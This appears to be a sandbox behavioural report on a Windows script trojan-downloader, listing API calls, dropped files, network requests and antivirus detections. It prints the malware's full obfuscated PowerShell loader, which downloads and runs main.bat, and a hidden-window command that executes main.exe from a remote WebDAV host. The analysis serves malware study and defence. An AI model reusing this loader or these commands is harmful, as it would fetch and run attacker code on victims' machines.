stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05040000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05041000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05042000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05043000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Roaming\main.bat
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function KEPoAX($EfRUfukKc, $GYqeeXtk){[IO.File]::WriteAllBytes($EfRUfukKc, $GYqeeXtk)};function OhkhTpfBZqInCZvmW($EfRUfukKc){if($EfRUfukKc.EndsWith((ajAJbSPVIbAhoypR @(67888,67942,67950,67950))) -eq $True){rundll32.exe $EfRUfukKc }elseif($EfRUfukKc.EndsWith((ajAJbSPVIbAhoypR @(67888,67954,67957,67891))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $EfRUfukKc}elseif($EfRUfukKc.EndsWith((ajAJbSPVIbAhoypR @(67888,67951,67957,67947))) -eq $True){misexec /qn /i $EfRUfukKc}else{Start-Process $EfRUfukKc}};function TBHPplqmTGEcWZ($gcEHEosamOU){$MKNeTksSViYoWh = New-Object (ajAJbSPVIbAhoypR @(67920,67943,67958,67888,67929,67943,67940,67909,67950,67947,67943,67952,67958));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GYqeeXtk = $MKNeTksSViYoWh.DownloadData($gcEHEosamOU);return $GYqeeXtk};function ajAJbSPVIbAhoypR($otOqVOnyi){$uYdhuBYtOsucbcH=67842;$zVMJBrInhZPv=$Null;foreach($ekRAhOcSGqDyRwp in $otOqVOnyi){$zVMJBrInhZPv+=[char]($ekRAhOcSGqDyRwp-$uYdhuBYtOsucbcH)};return $zVMJBrInhZPv};function KwcENQGqzCexrmkvH(){$eFuIwrNOzJBJS = $env:AppData + '\';$gZwVPv = $eFuIwrNOzJBJS + 'main.bat'; if (Test-Path -Path $gZwVPv){OhkhTpfBZqInCZvmW $gZwVPv;}Else{ $cNQduXeOw = TBHPplqmTGEcWZ (ajAJbSPVIbAhoypR @(67946,67958,67958,67954,67900,67889,67889,67899,67891,67888,67892,67890,67897,67888,67891,67898,67893,67888,67899,67900,67898,67890,67890,67890,67889,67951,67939,67947,67952,67888,67940,67939,67958));KEPoAX $gZwVPv $cNQduXeOw;OhkhTpfBZqInCZvmW $gZwVPv;};;;;}KwcENQGqzCexrmkvH;
cmdline powershell.exe -ExecutionPolicy UnRestricted function KEPoAX($EfRUfukKc, $GYqeeXtk){[IO.File]::WriteAllBytes($EfRUfukKc, $GYqeeXtk)};function OhkhTpfBZqInCZvmW($EfRUfukKc){if($EfRUfukKc.EndsWith((ajAJbSPVIbAhoypR @(67888,67942,67950,67950))) -eq $True){rundll32.exe $EfRUfukKc }elseif($EfRUfukKc.EndsWith((ajAJbSPVIbAhoypR @(67888,67954,67957,67891))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $EfRUfukKc}elseif($EfRUfukKc.EndsWith((ajAJbSPVIbAhoypR @(67888,67951,67957,67947))) -eq $True){misexec /qn /i $EfRUfukKc}else{Start-Process $EfRUfukKc}};function TBHPplqmTGEcWZ($gcEHEosamOU){$MKNeTksSViYoWh = New-Object (ajAJbSPVIbAhoypR @(67920,67943,67958,67888,67929,67943,67940,67909,67950,67947,67943,67952,67958));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GYqeeXtk = $MKNeTksSViYoWh.DownloadData($gcEHEosamOU);return $GYqeeXtk};function ajAJbSPVIbAhoypR($otOqVOnyi){$uYdhuBYtOsucbcH=67842;$zVMJBrInhZPv=$Null;foreach($ekRAhOcSGqDyRwp in $otOqVOnyi){$zVMJBrInhZPv+=[char]($ekRAhOcSGqDyRwp-$uYdhuBYtOsucbcH)};return $zVMJBrInhZPv};function KwcENQGqzCexrmkvH(){$eFuIwrNOzJBJS = $env:AppData + '\';$gZwVPv = $eFuIwrNOzJBJS + 'main.bat'; if (Test-Path -Path $gZwVPv){OhkhTpfBZqInCZvmW $gZwVPv;}Else{ $cNQduXeOw = TBHPplqmTGEcWZ (ajAJbSPVIbAhoypR @(67946,67958,67958,67954,67900,67889,67889,67899,67891,67888,67892,67890,67897,67888,67891,67898,67893,67888,67899,67900,67898,67890,67890,67890,67889,67951,67939,67947,67952,67888,67940,67939,67958));KEPoAX $gZwVPv $cNQduXeOw;OhkhTpfBZqInCZvmW $gZwVPv;};;;;}KwcENQGqzCexrmkvH;
cmdline C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \\91.207.183.9@8000\DavWWWRoot\main.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell.exe
parameters: -ExecutionPolicy UnRestricted function KEPoAX($EfRUfukKc, $GYqeeXtk){[IO.File]::WriteAllBytes($EfRUfukKc, $GYqeeXtk)};function OhkhTpfBZqInCZvmW($EfRUfukKc){if($EfRUfukKc.EndsWith((ajAJbSPVIbAhoypR @(67888,67942,67950,67950))) -eq $True){rundll32.exe $EfRUfukKc }elseif($EfRUfukKc.EndsWith((ajAJbSPVIbAhoypR @(67888,67954,67957,67891))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $EfRUfukKc}elseif($EfRUfukKc.EndsWith((ajAJbSPVIbAhoypR @(67888,67951,67957,67947))) -eq $True){misexec /qn /i $EfRUfukKc}else{Start-Process $EfRUfukKc}};function TBHPplqmTGEcWZ($gcEHEosamOU){$MKNeTksSViYoWh = New-Object (ajAJbSPVIbAhoypR @(67920,67943,67958,67888,67929,67943,67940,67909,67950,67947,67943,67952,67958));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GYqeeXtk = $MKNeTksSViYoWh.DownloadData($gcEHEosamOU);return $GYqeeXtk};function ajAJbSPVIbAhoypR($otOqVOnyi){$uYdhuBYtOsucbcH=67842;$zVMJBrInhZPv=$Null;foreach($ekRAhOcSGqDyRwp in $otOqVOnyi){$zVMJBrInhZPv+=[char]($ekRAhOcSGqDyRwp-$uYdhuBYtOsucbcH)};return $zVMJBrInhZPv};function KwcENQGqzCexrmkvH(){$eFuIwrNOzJBJS = $env:AppData + '\';$gZwVPv = $eFuIwrNOzJBJS + 'main.bat'; if (Test-Path -Path $gZwVPv){OhkhTpfBZqInCZvmW $gZwVPv;}Else{ $cNQduXeOw = TBHPplqmTGEcWZ (ajAJbSPVIbAhoypR @(67946,67958,67958,67954,67900,67889,67889,67899,67891,67888,67892,67890,67897,67888,67891,67898,67893,67888,67899,67900,67898,67890,67890,67890,67889,67951,67939,67947,67952,67888,67940,67939,67958));KEPoAX $gZwVPv $cNQduXeOw;OhkhTpfBZqInCZvmW $gZwVPv;};;;;}KwcENQGqzCexrmkvH;
filepath: powershell.exe
1 1 0

CreateProcessInternalW

thread_identifier: 2916
thread_handle: 0x00000088
process_identifier: 2912
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \\91.207.183.9@8000\DavWWWRoot\main.exe
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2560
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef80000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received HTTP/1.1 200 OK Content-Length: 154 Last-Modified: Fri, 13 Oct 2023 13:17:27 GMT Content-Type: text/plain Date: Tue, 17 Oct 2023 01:09:52 GMT ETag: "5720f861963a7d5332b9171ecdc663c0-1697203047-154" Accept-Ranges: bytes Server: WsgiDAV/4.2.0 Cheroot/9.0.0 Python 3.11.1
Data received C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \\91.207.183.9@8000\DavWWWRoot\main.exe
Data sent GET /main.bat HTTP/1.1 Host: 91.207.183.9:8000 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
host 91.207.183.9
file C:\Users\test22\AppData\Roaming\main.bat
Time & API Arguments Status Return Repeated

send

buffer: GET /main.bat HTTP/1.1 Host: 91.207.183.9:8000 Connection: Keep-Alive
socket: 1436
sent: 75
1 75 0
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Roaming\main.bat"
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\main.bat
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -executionpolicy bypass value Attempts to bypass execution policy
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
Lionic Trojan.Script.Generic.4!c
MicroWorld-eScan VB:Trojan.Valyria.7482
FireEye VB:Trojan.Valyria.7482
Arcabit VB:Trojan.Valyria.D1D3A
Symantec Trojan.Gen.NPE
ESET-NOD32 VBS/Agent.QVR
Avast Script:SNH-gen [Drp]
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan-Downloader.Script.Generic
BitDefender VB:Trojan.Valyria.7482
NANO-Antivirus Trojan.Script.Downloader.jpdglv
Tencent Script.Trojan-Downloader.Generic.Qsmw
Emsisoft VB:Trojan.Valyria.7482 (B)
F-Secure Malware.VBS/Dldr.Agent.VPLT
VIPRE VB:Trojan.Valyria.7482
Ikarus Trojan.VBS.Agent
Varist VBS/Agent.AZC!Eldorado
Avira VBS/Dldr.Agent.VPLT
GData VB:Trojan.Valyria.7482
Google Detected
ALYac VB:Trojan.Valyria.7482
Rising Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:RXmrIh5jYAI)
MAX malware (ai score=84)
Fortinet VBS/Agent.BSD!tr
AVG Script:SNH-gen [Drp]